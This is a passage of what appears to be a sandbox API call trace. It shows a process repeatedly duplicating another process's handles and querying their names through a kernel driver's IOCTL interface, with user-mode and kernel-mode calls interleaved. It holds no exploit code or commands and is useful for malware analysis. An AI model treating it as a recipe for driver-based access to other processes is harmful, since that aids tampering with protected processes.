SystemInformation=0x268310, ResultLength=0x14e420*=0x16fe8) returned 0xc0000004 [0288.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x268310, Length=0x18000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0x16fe8) returned 0x0 [0288.489] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x184 [0288.489] GetCurrentProcess () returned 0xffffffffffffffff [0288.489] DuplicateHandle (in: hSourceProcessHandle=0x184, hSourceHandle=0x180, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.489] CloseHandle (hObject=0x184) returned 1 [0288.489] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.489] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x98, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.489] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.489] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.489] PsAcquireProcessExitSynchronization () returned 0x0 [0288.489] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.489] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000694fa060, HandleInformation=0x0) returned 0x0 [0288.489] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.489] PsReleaseProcessExitSynchronization () returned 0x2 [0288.489] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x28015 [0288.489] ObQueryNameString (in: Object=0xffffe000694fa060, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.489] ObfDereferenceObject (Object=0xffffe000694fa060) returned 0xffff [0288.489] IoCompleteRequest () returned 0x0 [0288.489] CloseHandle (hObject=0x188) returned 1 [0288.490] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x188 [0288.490] GetCurrentProcess () returned 0xffffffffffffffff [0288.490] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x184) returned 1 [0288.490] CloseHandle (hObject=0x188) returned 1 [0288.490] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.490] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.490] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.490] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.490] PsAcquireProcessExitSynchronization () returned 0x0 [0288.490] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.490] ObReferenceObjectByHandle (in: Handle=0x17c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3f2c10, HandleInformation=0x0) returned 0x0 [0288.490] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.490] PsReleaseProcessExitSynchronization () returned 0x2 [0288.490] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x28013 [0288.490] ObQueryNameString (in: Object=0xffffe0006a3f2c10, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.490] ObfDereferenceObject (Object=0xffffe0006a3f2c10) returned 0xfffe [0288.490] IoCompleteRequest () returned 0x0 [0288.490] CloseHandle (hObject=0x184) returned 1 [0288.490] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x184 [0288.490] GetCurrentProcess () returned 0xffffffffffffffff [0288.490] DuplicateHandle (in: hSourceProcessHandle=0x184, hSourceHandle=0x170, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.490] CloseHandle (hObject=0x184) returned 1 [0288.490] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.490] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.490] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.490] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.490] PsAcquireProcessExitSynchronization () returned 0x0 [0288.490] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.490] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000694f93d0, HandleInformation=0x0) returned 0x0 [0288.490] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.490] PsReleaseProcessExitSynchronization () returned 0x2 [0288.490] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x28011 [0288.490] ObQueryNameString (in: Object=0xffffe000694f93d0, ObjectNameInfo=0xffffe000694407c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000694407c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.490] ObfDereferenceObject (Object=0xffffe000694f93d0) returned 0xffff [0288.490] IoCompleteRequest () returned 0x0 [0288.491] CloseHandle (hObject=0x188) returned 1 [0288.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x188 [0288.491] GetCurrentProcess () returned 0xffffffffffffffff [0288.491] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x184) returned 1 [0288.491] CloseHandle (hObject=0x188) returned 1 [0288.491] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.491] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.491] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.491] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.491] PsAcquireProcessExitSynchronization () returned 0x0 [0288.491] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.491] ObReferenceObjectByHandle (in: Handle=0x16c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068457300, HandleInformation=0x0) returned 0x0 [0288.491] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.491] PsReleaseProcessExitSynchronization () returned 0x2 [0288.491] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x2800f [0288.491] ObQueryNameString (in: Object=0xffffe00068457300, ObjectNameInfo=0xffffe0006a70c7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a70c7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.491] ObfDereferenceObject (Object=0xffffe00068457300) returned 0xffff [0288.491] IoCompleteRequest () returned 0x0 [0288.491] CloseHandle (hObject=0x184) returned 1 [0288.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x184 [0288.491] GetCurrentProcess () returned 0xffffffffffffffff [0288.491] DuplicateHandle (in: hSourceProcessHandle=0x184, hSourceHandle=0x168, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.491] CloseHandle (hObject=0x184) returned 1 [0288.491] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.491] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.491] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.491] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.491] PsAcquireProcessExitSynchronization () returned 0x0 [0288.491] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.491] ObReferenceObjectByHandle (in: Handle=0x168, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006f7fa500, HandleInformation=0x0) returned 0x0 [0288.491] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.491] PsReleaseProcessExitSynchronization () returned 0x2 [0288.491] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x2800d [0288.491] ObQueryNameString (in: Object=0xffffe0006f7fa500, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.491] ObfDereferenceObject (Object=0xffffe0006f7fa500) returned 0xfffa [0288.491] IoCompleteRequest () returned 0x0 [0288.491] CloseHandle (hObject=0x188) returned 1 [0288.491] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x188 [0288.492] GetCurrentProcess () returned 0xffffffffffffffff [0288.492] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x164, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x184) returned 1 [0288.492] CloseHandle (hObject=0x188) returned 1 [0288.492] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.492] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.492] NtQueryInformationThread (in: ThreadHandle=0x184, ThreadInformationClass=0x0, ThreadInformation=0x14d508, ThreadInformationLength=0x30, ReturnLength=0x14d4b0 | out: ThreadInformation=0x14d508, ReturnLength=0x14d4b0) returned 0xc0000022 [0288.492] CloseHandle (hObject=0x184) returned 1 [0288.492] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x184 [0288.492] GetCurrentProcess () returned 0xffffffffffffffff [0288.492] DuplicateHandle (in: hSourceProcessHandle=0x184, hSourceHandle=0x160, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.492] CloseHandle (hObject=0x184) returned 1 [0288.492] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.492] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.492] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.492] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.492] PsAcquireProcessExitSynchronization () returned 0x0 [0288.492] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.492] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6a3800, HandleInformation=0x0) returned 0x0 [0288.492] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.492] PsReleaseProcessExitSynchronization () returned 0x2 [0288.492] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x2800a [0288.492] ObQueryNameString (in: Object=0xffffe0006a6a3800, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.492] ObfDereferenceObject (Object=0xffffe0006a6a3800) returned 0xffff [0288.492] IoCompleteRequest () returned 0x0 [0288.492] CloseHandle (hObject=0x188) returned 1 [0288.492] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x188 [0288.492] GetCurrentProcess () returned 0xffffffffffffffff [0288.492] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x0) returned 0 [0288.492] CloseHandle (hObject=0x188) returned 1 [0288.492] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335004c, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x266f70, nOutBufferSize=0x88, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x266f70*, lpBytesReturned=0x14d450*=0x28, lpOverlapped=0x0) returned 1 [0288.492] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf3d8 | out: Process=0xffffd000ac0cf3d8) returned 0x0 [0288.492] PsAcquireProcessExitSynchronization () returned 0x0 [0288.492] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf3f8 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf3f8) [0288.492] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf3e0, HandleInformation=0x0 | out: Object=0xffffd000ac0cf3e0*=0xffffe00069921430, HandleInformation=0x0) returned 0x0 [0288.492] PsReleaseProcessExitSynchronization () returned 0x2 [0288.492] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x28008 [0288.492] ZwQueryObject (in: Handle=0x15c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xffffd000ac0cf3d4 | out: ObjectInformation=0x0, ReturnLength=0xffffd000ac0cf3d4) returned 0xc0000004 [0288.492] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x88, Tag=0x58637250) returned 0xffffc0014dccd960 [0288.493] ZwQueryObject (in: Handle=0x15c, ObjectInformationClass=0x2, ObjectInformation=0xffffc0014dccd960, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0xffffc0014dccd960, ReturnLength=0x0) returned 0x0 [0288.493] ExFreePoolWithTag (P=0xffffc0014dccd960, Tag=0x0) [0288.493] ObfDereferenceObject (Object=0xffffe00069921430) returned 0x7ffe [0288.493] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf3f8) [0288.493] IoCompleteRequest () returned 0x0 [0288.493] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.493] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.493] PsAcquireProcessExitSynchronization () returned 0x0 [0288.493] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.493] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069921430, HandleInformation=0x0) returned 0x0 [0288.493] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.493] PsReleaseProcessExitSynchronization () returned 0x2 [0288.493] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x28007 [0288.493] ObQueryNameString (in: Object=0xffffe00069921430, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.493] ObfDereferenceObject (Object=0xffffe00069921430) returned 0x7ffd [0288.493] IoCompleteRequest () returned 0x0 [0288.493] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x188 [0288.493] GetCurrentProcess () returned 0xffffffffffffffff [0288.493] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x184) returned 1 [0288.493] CloseHandle (hObject=0x188) returned 1 [0288.493] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.493] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.493] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x2e, lpOverlapped=0x0) returned 1 [0288.493] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.493] PsAcquireProcessExitSynchronization () returned 0x0 [0288.493] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.493] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006f7fba60, HandleInformation=0x0) returned 0x0 [0288.493] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.493] PsReleaseProcessExitSynchronization () returned 0x2 [0288.493] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x28005 [0288.493] ObQueryNameString (in: Object=0xffffe0006a372e40, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.493] ObfDereferenceObject (Object=0xffffe0006f7fba60) returned 0xfff8 [0288.493] IoCompleteRequest () returned 0x0 [0288.493] CloseHandle (hObject=0x184) returned 1 [0288.493] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x184 [0288.493] GetCurrentProcess () returned 0xffffffffffffffff [0288.493] DuplicateHandle (in: hSourceProcessHandle=0x184, hSourceHandle=0x148, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.493] CloseHandle (hObject=0x184) returned 1 [0288.493] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.493] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.494] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x82, lpOverlapped=0x0) returned 1 [0288.494] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.494] PsAcquireProcessExitSynchronization () returned 0x0 [0288.494] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.494] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffc0014dd6cd90, HandleInformation=0x0) returned 0x0 [0288.494] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.494] PsReleaseProcessExitSynchronization () returned 0x2 [0288.494] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x28003 [0288.494] ObQueryNameString (in: Object=0xffffc0014dd6cd90, ObjectNameInfo=0xffffe0006a65b044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a65b044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.494] ObfDereferenceObject (Object=0xffffc0014dd6cd90) returned 0xfff9 [0288.494] IoCompleteRequest () returned 0x0 [0288.494] CloseHandle (hObject=0x188) returned 1 [0288.494] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x188 [0288.494] GetCurrentProcess () returned 0xffffffffffffffff [0288.494] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x110, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x184) returned 1 [0288.494] CloseHandle (hObject=0x188) returned 1 [0288.494] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.494] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.494] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.494] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.494] PsAcquireProcessExitSynchronization () returned 0x0 [0288.494] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.494] ObReferenceObjectByHandle (in: Handle=0x110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a01b5f0, HandleInformation=0x0) returned 0x0 [0288.494] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.494] PsReleaseProcessExitSynchronization () returned 0x2 [0288.494] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x28001 [0288.494] ObQueryNameString (in: Object=0xffffe0006a01b5f0, ObjectNameInfo=0xffffe0006a6fa7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: 